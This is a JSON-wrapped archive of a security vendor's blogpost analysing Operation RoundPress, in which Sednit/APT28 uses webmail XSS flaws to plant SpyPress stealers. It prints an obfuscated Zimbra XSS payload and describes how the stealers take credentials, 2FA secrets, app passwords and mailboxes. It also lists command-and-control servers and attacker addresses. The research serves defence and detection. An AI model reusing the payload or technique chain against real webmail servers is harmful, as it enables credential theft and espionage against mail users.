{
	"id": "354b1ddd-2768-4d24-a2bc-304587d349cc",
	"created_at": "2026-04-06T00:10:33.803012Z",
	"updated_at": "2026-04-10T03:37:49.887403Z",
	"deleted_at": null,
	"sha1_hash": "e2c747a4021a1d5fcf088e14331c633969283fd9",
	"title": "Operation RoundPress targeting high-value webmail servers",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2824118,
	"plain_text": "Operation RoundPress targeting high-value webmail servers\r\nBy Matthieu Faou\r\nArchived: 2026-04-05 16:51:53 UTC\r\nThis blogpost introduces an operation that we named RoundPress, targeting high-value webmail servers with XSS\r\nvulnerabilities, and that we assess with medium confidence is run by the Sednit cyberespionage group. The\r\nultimate goal of this operation is to steal confidential data from specific email accounts.\r\nKey points of this blogpost:\r\nIn Operation RoundPress, the compromise vector is a spearphishing email leveraging an XSS\r\nvulnerability to inject malicious JavaScript code into the victim’s webmail page.\r\nIn 2023, Operation RoundPress only targeted Roundcube, but in 2024 it expanded to other\r\nwebmail software including Horde, MDaemon, and Zimbra.\r\nFor MDaemon, Sednit used a zero-day XSS vulnerability. We reported the vulnerability to the\r\ndevelopers on November 1st, 2024 and it was patched in version 24.5.1.\r\nMost victims are governmental entities and defense companies in Eastern Europe, although we\r\nhave observed governments in Africa, Europe, and South America being targeted as well.\r\nWe provide an analysis of the JavaScript payloads SpyPress.HORDE, SpyPress.MDAEMON,\r\nSpyPress.ROUNDCUBE, and SpyPress.ZIMBRA.\r\nThese payloads are able to steal webmail credentials, and exfiltrate contacts and email messages\r\nfrom the victim’s mailbox.\r\nAdditionally, SpyPress.MDAEMON is able to set up a bypass for two-factor authentication.\r\nSednit profile\r\nThe Sednit group – also known as APT28, Fancy Bear, Forest Blizzard, or Sofacy – has been operating since at\r\nleast 2004. The US Department of Justice named the group as one of those responsible for the Democratic\r\nNational Committee (DNC) hack just before the 2016 US elections and linked the group to the GRU. 
The group is\r\nalso presumed to be behind the hacking of global television network TV5Monde, the World Anti-Doping Agency\r\n(WADA) email leak, and many other incidents. Sednit has a diversified set of malware tools in its arsenal, several\r\nexamples of which we have documented previously in our Sednit white paper from 2016.\r\nLinks to Sednit\r\nOn September 29th, 2023, we detected a spearphishing email, part of Operation RoundPress, sent from\r\nkatecohen1984@portugalmail[.]pt (envelope-from address). The email exploited CVE‑2023‑43770 in Roundcube.\r\nThis email address is very similar to the ones used in other Sednit campaigns in 2023, as documented by Unit42\r\nfor example.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-roundpress/\r\nPage 1 of 28\n\nLeveraging a network scan we ran in February 2022, we found the server 45.138.87[.]250 / ceriossl[.]info, which\r\nwas configured in the same unique way as 77.243.181[.]238 / global-world-news[.]net. The former was mentioned\r\nin a Qianxin blogpost describing a campaign abusing CVE-2023-23397 that attributed it to Sednit. The latter is a\r\ndomain used in Operation RoundPress in 2023.\r\nGiven these two elements, we believe with medium confidence that Operation RoundPress is carried out by\r\nSednit.\r\nVictimology\r\nTable 1 and Figure 1 detail targets of Operation RoundPress in 2024, from ESET telemetry and two samples on\r\nVirusTotal.\r\nMost of the targets are related to the current war in Ukraine; they are either Ukrainian governmental entities or\r\ndefense companies in Bulgaria and Romania. Notably, some of these defense companies are producing Soviet-era\r\nweapons to be sent to Ukraine.\r\nOther targets include African, EU, and South American governments.\r\nTable 1. 
Operation RoundPress victims in 2024\r\nDate | Country | Sector\r\n2024-05 | Greece | National government.\r\n2024-05 | Romania | Unknown (VirusTotal submission).\r\n2024-05 | Ukraine | Specialized Prosecutor’s Office in the Field of Defense of the Western Region (VirusTotal submission).\r\n2024-06 | Bulgaria | Telecommunications for the defense sector.\r\n2024-06 | Cameroon | National government.\r\n2024-06 | Ukraine | Military.\r\n2024-07 | Ecuador | Military.\r\n2024-07 | Ukraine | Regional government.\r\n2024-07 | Serbia | National government.\r\n2024-09 | Cyprus | An academic in environmental studies.\r\n2024-09 | Romania | Defense company.\r\n2024-09 | Ukraine | Military.\r\n2024-10 | Bulgaria | Defense company.\r\n2024-11 | Bulgaria | Defense company (not the same as in 2024-10).\r\n2024-11 | Ukraine | Civil air transport company.\r\n2024-11 | Ukraine | Defense company.\r\n2024-12 | Ukraine | State company in the transportation sector.\r\nFigure 1. Map of Operation RoundPress victims in 2024\r\nCompromise chain\r\nInitial access\r\nIn 2023, Sednit was exploiting CVE-2020-35730, a known XSS vulnerability in Roundcube (see this CERT-UA\r\nblogpost and this Recorded Future report), which enables the loading of arbitrary JavaScript code in the context of\r\nthe webmail window.\r\nIn 2024, we observed different XSS vulnerabilities being used to target additional webmail software: Horde,\r\nMDaemon, and Zimbra. Sednit also started to use a more recent vulnerability in Roundcube, CVE-2023-43770.\r\nThe MDaemon vulnerability (CVE-2024-11182, now patched) was a zero day, most likely discovered by Sednit,\r\nwhile the ones for Horde, Roundcube, and Zimbra were already known and patched.\r\nSednit sends these XSS exploits by email. The exploits lead to the execution of malicious JavaScript code in the\r\ncontext of the webmail client web page running in a browser window. 
Therefore, only data accessible from the\r\nvictim’s account can be read and exfiltrated.\r\nNote that, in order for the exploit to work, the target must be convinced to open the email message in the\r\nvulnerable webmail portal. This means that the email needs to bypass any spam filtering and the subject line needs\r\nto be convincing enough to entice the target into reading the email message.\r\nFigure 2 summarizes the compromise chain used in Operation RoundPress.\r\nFigure 2. Operation RoundPress compromise chain\r\nGenerally, the email message looks benign and contains text about news events. For example, on September 11th,\r\n2024, a Ukrainian target received a phishing email from kyivinfo24@ukr[.]net with the subject СБУ схопила\r\nбанкіра, який працював на ворожу воєнну розвідку в Харкові (machine translation: SBU arrested a banker\r\nwho worked for enemy military intelligence in Kharkiv). The message body – see Figure 3 – contains excerpts (in\r\nUkrainian) and links to articles from Kyiv Post, a well-known newspaper in Ukraine. The malicious code that\r\ntriggers the XSS vulnerability is inside the HTML code of the email message’s body and is not directly visible to\r\nthe user.\r\nFigure 3. Malicious email message sent by Sednit\r\nAnother example is an email from office@terembg[.]com to a Bulgarian target on November 8th, 2024, with the\r\nsubject Путин се стреми Тръмп да приеме руските условия в двустранните отношения (machine translation:\r\nPutin seeks Trump’s acceptance of Russian conditions in bilateral relations). The message body – see Figure 4 –\r\nagain contains excerpts (in Bulgarian) and links to articles from News.bg, a legitimate Bulgarian newspaper.\r\nFigure 4. 
Another malicious email sent by Sednit\r\nNote that some of these vulnerabilities are not of interest exclusively to this group: GreenCube (also known as\r\nUNC3707) and Winter Vivern have been exploiting them as well.\r\nHorde: Unknown exploit\r\nFor targets using Horde webmail, we have seen Sednit using an old vulnerability. We were unable to find the exact\r\nvulnerability, but it appears to be an XSS flaw that was already fixed in the first version of Xss.php committed to\r\nGitHub, and in Horde Webmail 1.0, which was released in 2007.\r\nThe intended exploit used by Sednit is shown in Figure 5. Placing malicious JavaScript code in the onerror\r\nattribute of an img element is a technique taken straight from the XSS playbook: because the src attribute is x, an\r\nundefined value, onerror is called and the payload is base64 decoded and then evaluated using\r\nwindow.parent.eval.\r\nFigure 5. Horde webmail exploit\r\nIn Horde Webmail version 1.0, the XSS filter removes the style elements and the on* attributes, such as onerror.\r\nThus, we believe that Sednit made a mistake and tried to use a nonworking exploit.\r\nMDaemon: CVE-2024-11182\r\nOn November 1st, 2024, we detected an email message sent to two Ukrainian state-owned defense companies and\r\na Ukrainian civil air transport company.\r\nThis message exploited a zero-day XSS vulnerability in MDaemon Email Server, in the rendering of untrusted\r\nHTML code in email messages. We reported the vulnerability to the developers on November 1st, 2024 and it was\r\npatched in version 24.5.1, which was released on November 14th, 2024; we then issued CVE-2024-11182 for it.\r\nThe exploit used by Sednit is shown in Figure 6. 
Just as for Horde, it relies on a specially crafted img element, but\r\nuses a bug in the MDaemon HTML parser where a noembed end tag inserted within the title attribute of a p\r\nelement tricks the parser into rendering the immediately succeeding img tag.\r\nFigure 6. Exploit for CVE-2024-11182 in MDaemon\r\nRoundcube: CVE-2023-43770\r\nFor targets using Roundcube webmail: in 2023, Sednit used the XSS vulnerability CVE‑2020‑35730, while in\r\n2024, it switched to CVE-2023-43770.\r\nThe more recent vulnerability was patched on September 14th, 2023 in this GitHub commit. The fix is in a regex\r\nin the rcube_string_replacer.php script. The exploit used by Sednit is quite simple and is depicted in Figure 7.\r\nFigure 7. Exploit for CVE-2023-43770 in Roundcube\r\nIn rcube_string_replacer.php, URLs are converted to hyperlinks, and the hyperlink text is what is expected to be\r\nprovided between the outer set of square brackets. The bug lies in the fact that the hyperlink text is not properly\r\nsanitized, allowing the characters \u003c and \u003e. This enables an attacker to provide JavaScript code contained between\r\n\u003cscript\u003e and \u003c/script\u003e, which is directly added to the page when the email is rendered in Roundcube.\r\nZimbra: CVE-2024-27443 / ZBUG-3730\r\nFor Zimbra, Sednit uses CVE-2024-27443 (also tracked as ZBUG-3730). It was patched on March 1st, 2024 in\r\nthis GitHub commit, in the ZmInviteMsgView.js file. The vulnerability lies in failing to sanitize the cif (calendar\r\nintended for) attribute, in a calendar invitation sent by email.\r\nThe cif attribute is populated from the email header X-Zimbra-Calendar-Intended-For. Before the patch, the value\r\nwas directly added to the Zimbra HTML page without sanitization. 
This allowed the execution of malicious\r\nJavaScript code in the context of the webmail browser window.\r\nThe exploit code that we found in this header is the following:\r\nZimbra Calendar\u003cimg/alt=''/src='Zimbra-Calendar'/onerror=\\\"window[(function(tmz)\r\n{ghwa='cxe';return '\\\\x65'+decodeURI('%76')+'\\\\x61\\\\x6c'})()](window[(function(jvqka){const\r\nkqd=decodeURI('%61')+'\\t'+decodeURI('%6F')+'\\\\x62'; oykbg='doix'; return kqd})()]\r\n(frames[0].document.getElementById('a-cashed-skinLayout2')['\\inn\\e\\r\\T\\e\\xt']))\\\"\u003e\r\nThe beautified code contained in the onerror attribute is:\r\nwindow['eval'](window['atob'](frames[0].document.getElementById('a-cashed-skinLayout2')['innerText']))\r\nBasically, this reads the text contained in a div element, identified by ID a-cashed-skinLayout2, that is present in\r\nthe body of the calendar invite. This div element uses the style attribute with the value display:none so that it is\r\nnot visible to the target. The inner text contains base64-encoded JavaScript code that is run using eval.\r\nPersistence\r\nThe JavaScript payloads (SpyPress) loaded by the XSS vulnerabilities don’t have true persistence, but they are\r\nreloaded every time the victim opens the malicious email.\r\nIn addition, we detected a few SpyPress.ROUNDCUBE payloads that have the ability to create Sieve rules.\r\nSpyPress.ROUNDCUBE creates a rule that will send a copy of every incoming email to an attacker-controlled\r\nemail address. Sieve rules are a feature of Roundcube and therefore the rule will be executed even if the malicious\r\nscript is no longer running.\r\nCredential access\r\nAll SpyPress payloads have the ability to steal webmail credentials by trying to trick the browser or password\r\nmanager into filling webmail credentials into a hidden form. 
In addition, some samples also try to trick the victim by\r\nlogging them out of their webmail account and displaying a fake login page.\r\nCollection and exfiltration\r\nMost SpyPress payloads collect email messages and contact information from the victim’s mailbox. The data is\r\nthen exfiltrated via an HTTP POST request to a hardcoded C\u0026C server.\r\nIn 2024, we have observed Sednit using four payloads in Operation RoundPress: SpyPress.HORDE,\r\nSpyPress.MDAEMON, SpyPress.ROUNDCUBE, and SpyPress.ZIMBRA. They are injected into the victims’\r\nwebmail context using XSS vulnerabilities, as explained above.\r\nThe four payloads have common characteristics. All are similarly obfuscated, with variable and function names\r\nreplaced with random-looking strings – see Figure 8. Furthermore, strings used by the code, such as webmail and\r\nC\u0026C server URLs, are also obfuscated and contained in an encrypted list. Each of those strings is only decrypted\r\nwhen it is used. Note that the variable and function names are randomized for each sample, so the final SpyPress\r\npayloads will have different hashes.\r\nFigure 8. Obfuscation of the JavaScript code\r\nAnother common characteristic is that there are no persistence or update mechanisms. The payload is fully\r\ncontained in the email and only executed when the email message is viewed from a vulnerable webmail instance.\r\nFinally, all payloads communicate with their hardcoded C\u0026C servers via HTTP POST requests. There is a small\r\nnumber of C\u0026C servers that are shared by all payloads (there is no separation by victim or payload type).\r\nSpyPress.HORDE\r\nSpyPress.HORDE is the JavaScript payload injected into vulnerable Horde webmail instances. 
Once\r\ndeobfuscated, with functions and variables manually renamed, it reveals its main functionality: collecting and\r\nexfiltrating user credentials.\r\nCapabilities\r\nTo steal credentials, as shown in Figure 9, SpyPress.HORDE creates two HTML input elements: horde_user and\r\nhorde_pass. Their width and opacity are set to 0%, ensuring that they are not visible to the user. The goal is to\r\ntrick browsers and password managers into filling those values. Note that a callback for the change event is\r\ncreated on the input horde_pass. This calls the function input_password_on_change as soon as the input element\r\nloses focus after its value is changed.\r\nFigure 9. SpyPress.HORDE credential stealer\r\nThen, input_password_on_change exfiltrates the data by calling C2_POST_Request, as can be seen in Figure 10.\r\nNetwork protocol\r\nThe C\u0026C URL is hardcoded in the script (see Figure 10) and the exfiltration is done via an HTTPS POST request.\r\nThe body data has a specific format that is sent base64 encoded. For example,\r\nbWVAdmljdGltLm9yZyA6OiBweAoKbXl1c2VybmFtZSBteXBhc3N3b3Jk decodes to:\r\nme@victim.org :: px\r\nmyusername mypassword\r\nwhere px probably means password exfiltration.\r\nNote that the HTTP request is made by the victim’s browser, so HTTP headers such as the User-Agent will vary\r\nfrom victim to victim.\r\nFigure 10. SpyPress.HORDE data exfiltration\r\nSpyPress.MDAEMON\r\nSpyPress.MDAEMON is a JavaScript payload injected into vulnerable MDaemon webmail instances. 
Once\r\ndeobfuscated, it reveals more functionality than what was implemented in SpyPress.HORDE:\r\ncredential stealing (very similar to the SpyPress.HORDE implementation),\r\nexfiltration of contacts and login history,\r\nexfiltration of email messages,\r\nexfiltration of the two-factor authentication secret, and\r\ncreation of an App Password, which enables attackers to access the mailbox from a mail application and to\r\nbypass 2FA protection.\r\nCapabilities\r\nCredential stealer\r\nThe credential stealer of SpyPress.MDAEMON is almost identical to that of SpyPress.HORDE – see Figure 11.\r\nThe only difference is the name of the input fields, which are User and Password, to match the official names used\r\nin the MDaemon software.\r\nFigure 11. SpyPress.MDAEMON credential stealer\r\nContacts and login history\r\nSpyPress.MDAEMON obtains the victim’s login history from\r\nhttps://\u003cwebmail_URL\u003e/WorldClient.dll?Session=\u003csession_ID\u003e\u0026View=Options-Authentication\u0026GetLoginHistory=Yes, and exfiltrates the content to the hardcoded\r\nC\u0026C server. It uses the same function used in the credential stealer part to send an HTTP POST request to the\r\nC\u0026C server, but instead of px, it uses ab as the message type.\r\nThen, as shown in Figure 12, the script obtains the victim’s contact list from\r\nhttps://\u003cwebmail_URL\u003e/WorldClient.dll?Session=\u003csession_ID\u003e\u0026View=Contacts. This list, and the associated\r\nemail addresses (in the eml JavaScript property), are then exfiltrated to the C\u0026C server.\r\nFigure 12. 
Exfiltration of login history and contacts\r\nEmail message exfiltration\r\nSpyPress.MDAEMON browses the victim’s mailbox folders, as shown in Figure 13, and filters out a hardcoded\r\nlist of folders the attackers are not interested in: calendar, notes, documents, contacts, tasks, allowed senders, and\r\nblocked senders.\r\nFigure 13. SpyPress.MDAEMON browses the victim’s mailbox folders\r\nThen, for each folder, as shown in Figure 14, SpyPress.MDAEMON iterates over the pages and then over all\r\nmessages in each page, before exfiltrating each email to the C\u0026C server.\r\nTo get a list of email messages in a given folder page, SpyPress.MDAEMON fetches\r\nhttps://\u003cwebmail_URL\u003e/WorldClient.dll?Session=\u003csession_ID\u003e\u0026View=List\u0026ReturnJavaScript=1\u0026FolderID=\u003cfolder_ID\u003e\u0026Sort=RevDate\u0026Page=\u003cpage\u003e\u0026UTF8=1.\r\nThen, it iterates over this list and fetches\r\nhttps://\u003cwebmail_URL\u003e/WorldClient.dll?Session=\u003csession_ID\u003e\u0026View=Message\u0026Source=Yes\u0026Number=\u003cemail_ID\u003e\u0026FolderId=\u003cfolder_ID\u003e to get the source of each email.\r\nFinally, the email source is exfiltrated via an HTTP POST request to the C\u0026C server, using the message type\r\nmail-\u003cfolder_name\u003e-\u003cemail_ID\u003e. An HTTP POST request is made for each exfiltrated email, and thus it will create a\r\nlarge amount of network traffic.\r\nNote that the script maintains a list of exfiltrated emails, thereby avoiding exfiltrating the same email several times.\r\nFigure 14. SpyPress.MDAEMON exfiltrates all emails\r\nAlso note that the obfuscator seems to have introduced errors in the script. In the function\r\ndownload_all_messages_from_folder, is_folder_limit is a real variable name that was left unobfuscated. 
However,\r\nit is not used anywhere in the code.\r\nTwo-factor authentication secret\r\nSpyPress.MDAEMON exfiltrates the victim’s two-factor authentication secret – see Figure 15. It first fetches\r\nhttps://\u003cwebmail_URL\u003e/WorldClient.dll?Session=\u003csession_ID\u003e\u0026View=Options-Authentication\u0026TwoFactorAuth=Yes\u0026GetSecret=Yes to get the secret, and then sends it to the C\u0026C server, using\r\nthe message type 2fa.\r\nTo view the secret, the password is required, which SpyPress.MDAEMON gets from the fake login form it\r\ncreated. This secret is equivalent to the QR code mentioned in MDaemon documentation and it can be used to\r\nregister the account in an authentication app, to then generate a valid 2FA code for the victim’s account. Because\r\nSpyPress.MDAEMON acquires the password and the 2FA secret, attackers will be able to log into the account\r\ndirectly.\r\nFigure 15. SpyPress.MDAEMON exfiltrates the 2FA secret\r\nApp Password creation\r\nIn addition to stealing the 2FA secret, SpyPress.MDAEMON creates an App Password (see the documentation).\r\nThis password can be used in an email client to send and receive messages, without having to enter the 2FA code,\r\neven if 2FA is activated for the account. Note that MDaemon webmail doesn’t seem to require a 2FA code to\r\ngenerate a new application password.\r\nAs shown in Figure 16, SpyPress.MDAEMON fetches\r\nhttps://\u003cwebmail_URL\u003e/WorldClient.dll?Session=\u003csession_ID\u003e\u0026View=Options-Authentication\u0026CreateAppPassword=1s to create a new application password. The\r\nreply is this password, which is exfiltrated to the C\u0026C server with the message type create-app.\r\nIn other words, this application password enables attackers to add the email account directly to their own email\r\nclient. 
They can thereby keep access to the mailbox even if the main password of the victim’s account is changed\r\nor if the 2FA code is changed.\r\nFigure 16. SpyPress.MDAEMON creates an application password\r\nNetwork protocol\r\nSpyPress.MDAEMON uses the same network protocol as SpyPress.HORDE.\r\nSpyPress.ROUNDCUBE\r\nSpyPress.ROUNDCUBE is the JavaScript payload injected into vulnerable Roundcube webmail instances. Once\r\ndeobfuscated, it reveals similar functionalities to what is implemented in SpyPress.MDAEMON:\r\ncredential stealing,\r\nexfiltration of the address book and the about page,\r\nexfiltration of emails, and\r\nmalicious Sieve rules.\r\nCapabilities\r\nCredential stealer\r\nThe credential stealer of SpyPress.ROUNDCUBE has two features. The first one is almost identical to the\r\ncredential stealer of SpyPress.HORDE and SpyPress.MDAEMON. The only difference is the name of the input\r\nfields, which are _user and _pass, to match the official names used in the Roundcube software.\r\nThe second feature is slightly more intrusive. SpyPress.ROUNDCUBE creates an iframe, as shown in Figure 17,\r\nwith the src attribute set to https://\u003cwebmail_URL\u003e/?_task=logout\u0026_token=\u003cCSRF_token\u003e. This logs the victim\r\nout, forcing them to reenter their credentials. SpyPress.ROUNDCUBE adds a callback on the submit button of the\r\ngenuine login form. Finally, the credentials are exfiltrated to the hardcoded C\u0026C server using the message type\r\npax-fish.\r\nFigure 17. SpyPress.ROUNDCUBE creates an iframe to log out the victim\r\nNote that the CSRF token is retrieved from the variable rcmail.env.request_token. 
The rcmail global variable is\r\nmanaged and filled by the Roundcube instance, and accessible in the JavaScript context that\r\nSpyPress.ROUNDCUBE is running in.\r\nExfiltration of the address book and the about page\r\nSpyPress.ROUNDCUBE fetches the address book at\r\nhttps://\u003cwebmail_URL\u003e/?_task=addressbook\u0026_source=0\u0026_action=export\u0026\u0026_token=\u003cCSRF_token\u003e and sends\r\nthe raw output to the C\u0026C server.\r\nSimilarly, SpyPress.ROUNDCUBE fetches the about page at\r\nhttps://\u003cwebmail_URL\u003e/?_task=settings\u0026_framed=1\u0026_action=about and sends the raw output to the C\u0026C server.\r\nThat page contains information about the Roundcube version and the plugins installed, as shown in Figure 18.\r\nFigure 18. Example of Roundcube about page\r\nEmail message exfiltration\r\nSpyPress.ROUNDCUBE starts the email exfiltration routine every 7,200 seconds (two hours).\r\nFirst, it gets the list of mailboxes from the global variable rcmail.env.mailboxes. Then, it iterates over all those\r\nmailboxes; for each of them, it iterates over the pages to get the email message IDs by fetching\r\nhttps://\u003cwebmail_URL\u003e/?_task=mail\u0026_action=list\u0026_mbox=\u003cmailbox_name\u003e\u0026_refresh=1\u0026_remote=1\u0026_page=\u003ccurrent_page\u003e. 
Note that SpyPress.ROUNDCUBE adds the HTTP header X-Roundcube-Request, which\r\ncontains the CSRF token.\r\nAlso note that there is a hardcoded lower time bound in the script, 6:02:03 am, October 1st, 2024 in the specific\r\nscript sample we analyzed, and only emails more recent than this are exfiltrated.\r\nThe source of each email message is fetched from\r\nhttps://\u003cwebmail_URL\u003e/?_task=mail\u0026_mbox=\u003cmailbox\u003e\u0026_uid=\u003cemail_ID\u003e\u0026_action=viewsource and then\r\nexfiltrated to the C\u0026C server.\r\nNote that if SpyPress.ROUNDCUBE has exfiltrated more than 150 emails in a row, it stops the exfiltration until\r\nthe next execution of the email exfiltration routine (two hours later). This is probably done to limit the noise on\r\nthe victim’s network and avoid detection.\r\nMalicious Sieve rules\r\nIn some SpyPress.ROUNDCUBE samples, there is additional functionality related to Sieve rules – see Figure 19.\r\nSpyPress.ROUNDCUBE creates a rule that sends a copy of every incoming email message to an attacker-controlled\r\nemail address (srezoska@skiff[.]com in this case). Skiff was a privacy-oriented email service that\r\nprovided end-to-end encryption.\r\nFigure 19. SpyPress.ROUNDCUBE creates a malicious Sieve rule\r\nNetwork protocol\r\nSpyPress.ROUNDCUBE uses the same network protocol as SpyPress.HORDE.\r\nSpyPress.ZIMBRA\r\nSpyPress.ZIMBRA is the JavaScript payload injected into vulnerable Zimbra webmail instances. Once\r\ndeobfuscated, it reveals similar functionalities to the previous payloads:\r\ncredential stealing,\r\nexfiltration of contacts and settings, and\r\nexfiltration of email messages.\r\nCapabilities\r\nCredential stealer\r\nThe credential stealer of SpyPress.ZIMBRA is almost identical to those of SpyPress.HORDE and\r\nSpyPress.MDAEMON. 
The only difference is the name of the input fields, which are username and password, to\r\nmatch the official names used in the Zimbra software.\r\nExfiltration of contacts and settings\r\nSpyPress.ZIMBRA fetches the victim’s contact list by making a SOAP request to the Zimbra API endpoint\r\nhttps://\u003cwebmail_URL\u003e/service/soap/SearchRequest. As shown in Figure 20, the search query is contained in a\r\ndictionary that is sent to the Zimbra server in the body of a POST request. Finally, SpyPress.ZIMBRA exfiltrates\r\nthe raw output to the C\u0026C server.\r\nFigure 20. SpyPress.ZIMBRA gets the victim’s contact list\r\nSpyPress.ZIMBRA also exfiltrates to the C\u0026C server the content of the global variable ZmSetting, which contains\r\nvarious configuration and preference values. This is similar to SpyPress.ROUNDCUBE, which exfiltrates the\r\nabout page.\r\nEmail exfiltration\r\nEvery 14,400 seconds (four hours), using the setInterval function, this payload starts its email exfiltration routine.\r\nAs for the previous payloads, SpyPress.ZIMBRA first lists the folders, then iterates over the first 80 emails in each\r\nfolder via a SOAP request to https://\u003cwebmail_URL\u003e/service/soap/SearchRequest. 
For each message, the script\r\nfetches the source at https://\u003cwebmail_URL\u003e/service/home/~/?auth=co\u0026view=text\u0026id=\u003cemail_ID\u003e and then\r\nexfiltrates the email message source – see Figure 21.\r\nFigure 21. SpyPress.ZIMBRA exfiltrates email messages\r\nNetwork protocol\r\nSpyPress.ZIMBRA uses the same network protocol as SpyPress.HORDE.\r\nConclusion\r\nOver the past two years, webmail servers such as Roundcube and Zimbra have been a major target for several\r\nespionage groups such as Sednit, GreenCube, and Winter Vivern. Because many organizations don’t keep their\r\nwebmail servers up to date and because the vulnerabilities can be triggered remotely by sending an email message,\r\nit is very convenient for attackers to target such servers for email theft.\r\nFor any inquiries about our research published on WeLiveSecurity, please contact us at\r\nthreatintel@eset.com.\r\nESET Research offers private APT intelligence reports and data feeds. 
For any inquiries about this\r\nservice, visit the ESET Threat Intelligence page.\r\nIoCs\r\nA comprehensive list of indicators of compromise (IoCs) and samples can be found in our GitHub repository.\r\nFiles\r\nSHA-1 Filename Detection Description\r\n41FE2EFB38E0C7DD10E6\r\n009A68BD26687D6DBF4C\r\nN/A JS/Agent.RSO SpyPress.ZIMBRA.\r\n60D592765B0F4E08078D\r\n42B2F3DE4F5767F88773\r\nN/A JS/Exploit.Agent.NSH\r\nXSS exploit for CVE-2023-\r\n43770.\r\n1078C587FE2B246D618A\r\nF74D157F941078477579\r\nN/A JS/Exploit.Agent.NSH SpyPress.ROUNDCUBE.\r\n8EBBBC9EB54E216EFFB4\r\n37A28B9F2C7C9DA3A0FA\r\nN/A HTML/Phishing.Agent.GNZ\r\nXSS exploit for CVE-2024-\r\n11182.\r\nF95F26F1C097D4CA3830\r\n4ECC692DBAC7424A5E8D\r\nN/A HTML/Phishing.Agent.GNZ SpyPress.MDAEMON.\r\n2664593E2F5DCFDA9AAA\r\n1A2DF7C4CE7EEB1EDBB6\r\nN/A JS/Agent.SJU\r\nProbable XSS exploit for\r\nHorde.\r\nB6C340549700470C6510\r\n31865C2772D3A4C81310\r\nN/A JS/Agent.SJU SpyPress.HORDE.\r\n65A8D221B9ECED76B9C1\r\n7A3E1992DF9B085CECD7\r\nN/A HTML/Phishing.Gen SpyPress.ROUNDCUBE.\r\n6EF845938F064DE39F4B\r\nF6450119A0CDBB61378C\r\nN/A N/A\r\nEmail exploiting CVE-2023-43770, found on\r\nVirusTotal.\r\n8E6C07F38EF920B5154F\r\nD081BA252B9295E8184D\r\nN/A JS/Agent.RSP SpyPress.ROUNDCUBE.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-roundpress/\r\nPage 25 of 28\n\nSHA-1 Filename Detection Description\r\nAD3C590D1C0963D62702\r\n445E8108DB025EEBEC70\r\nN/A JS/Agent.RSN SpyPress.ZIMBRA.\r\nEBF794E421BE60C95320\r\n91EB432C1977517D1BE5\r\nN/A JS/Agent.RTD SpyPress.ROUNDCUBE.\r\nF81DE9584F0BF3E55C6C\r\nF1B465F00B2671DAA230\r\nN/A JS/Agent.RWO SpyPress.ROUNDCUBE.\r\nA5948E1E45D50A8DB063\r\nD7DFA5B6F6E249F61652\r\nN/A JS/Exploit.Agent.NSG\r\nXSS exploit for CVE-2023-\r\n43770.\r\nNetwork\r\nIP Domain Hosting provider First seen Details\r\n185.225.69[.]223 sqj[.]fr 23VNet Kft. 
| 2024‑06‑01 | SpyPress C\u0026C server.\r\n193.29.104[.]152 | tgh24[.]xyz, tuo[.]world | GLOBALAXS NOC PARIS | 2024‑06‑04 | SpyPress C\u0026C server.\r\n45.137.222[.]24 | lsjb[.]digital | Belcloud Administration | 2024‑07‑03 | SpyPress C\u0026C server.\r\n91.237.124[.]164 | jiaw[.]shop | HOSTGNOME LTD | 2023‑09‑28 | SpyPress C\u0026C server.\r\n185.195.237[.]106 | hfuu[.]de | Network engineer | 2024‑06‑03 | SpyPress C\u0026C server.\r\n91.237.124[.]153 | raxia[.]top | Damien Cutler | 2024‑06‑03 | SpyPress C\u0026C server.\r\n146.70.125[.]79 | rnl[.]world | GLOBALAXS NOC PARIS | 2024‑06‑07 | SpyPress C\u0026C server.\r\n89.44.9[.]74 | hijx[.]xyz | M247 Europe SRL | 2024‑07‑05 | SpyPress C\u0026C server.\r\n111.90.151[.]167 | ikses[.]net | Shinjiru Technology Sdn Bhd | 2024‑12‑01 | SpyPress C\u0026C server.\r\nMITRE ATT\u0026CK techniques\r\nThis table was built using version 17 of the MITRE ATT\u0026CK framework.\r\nTactic | ID | Name | Description\r\nResource Development | T1583.001 | Acquire Infrastructure: Domains | Sednit bought domains at various registrars.\r\nResource Development | T1583.004 | Acquire Infrastructure: Server | Sednit rented servers at M247 and other hosting providers.\r\nResource Development | T1587.004 | Develop Capabilities: Exploits | Sednit developed (or acquired) XSS exploits for Roundcube, Zimbra, Horde, and MDaemon.\r\nResource Development | T1587.001 | Develop Capabilities: Malware | Sednit developed JavaScript stealers (SpyPress.HORDE, SpyPress.MDAEMON, SpyPress.ROUNDCUBE, and SpyPress.ZIMBRA) to steal data from webmail servers.\r\nInitial Access | T1190 | Exploit Public-Facing Application | Sednit exploited known and zero-day vulnerabilities in webmail software to execute JavaScript code in the context of the victim’s webmail window.\r\nExecution | T1203 | Exploitation for Client Execution | SpyPress payloads are executed when a victim opens the malicious email in a vulnerable webmail 
client page.\r\nDefense Evasion | T1027 | Obfuscated Files or Information | SpyPress payloads are obfuscated with an unknown JavaScript obfuscator.\r\nCredential Access | T1187 | Forced Authentication | SpyPress payloads can log out users to entice them into entering their credentials in a fake login form.\r\nCredential Access | T1556.006 | Modify Authentication Process: Multi-Factor Authentication | SpyPress.MDAEMON can steal the 2FA token and create an application password.\r\nDiscovery | T1087.003 | Account Discovery: Email Account | SpyPress payloads get information about the email account, such as the contact list.\r\nCollection | T1056.003 | Input Capture: Web Portal Capture | SpyPress payloads try to steal webmail credentials by creating a hidden login form, to trick the browser and password managers into filling in the credentials.\r\nCollection | T1119 | Automated Collection | SpyPress payloads automatically collect credentials and email messages.\r\nCollection | T1114.002 | Email Collection: Remote Email Collection | SpyPress payloads collect and exfiltrate emails from the victim’s mailbox.\r\nCollection | T1114.003 | Email Collection: Email Forwarding Rule | SpyPress.MDAEMON adds a Sieve rule to forward any incoming email to an attacker-controlled email address.\r\nCommand and Control | T1071.001 | Application Layer Protocol: Web Protocols | C\u0026C communication is done via HTTPS.\r\nCommand and Control | T1071.003 | Application Layer Protocol: Mail Protocols | In the case of email forwarding rules, the exfiltration is done via email.\r\nCommand and Control | T1132.001 | Data Encoding: Standard Encoding | Data is base64 encoded before being sent to the C\u0026C server.\r\nExfiltration | T1020 | Automated Exfiltration | SpyPress payloads automatically exfiltrate credentials and email messages to the 
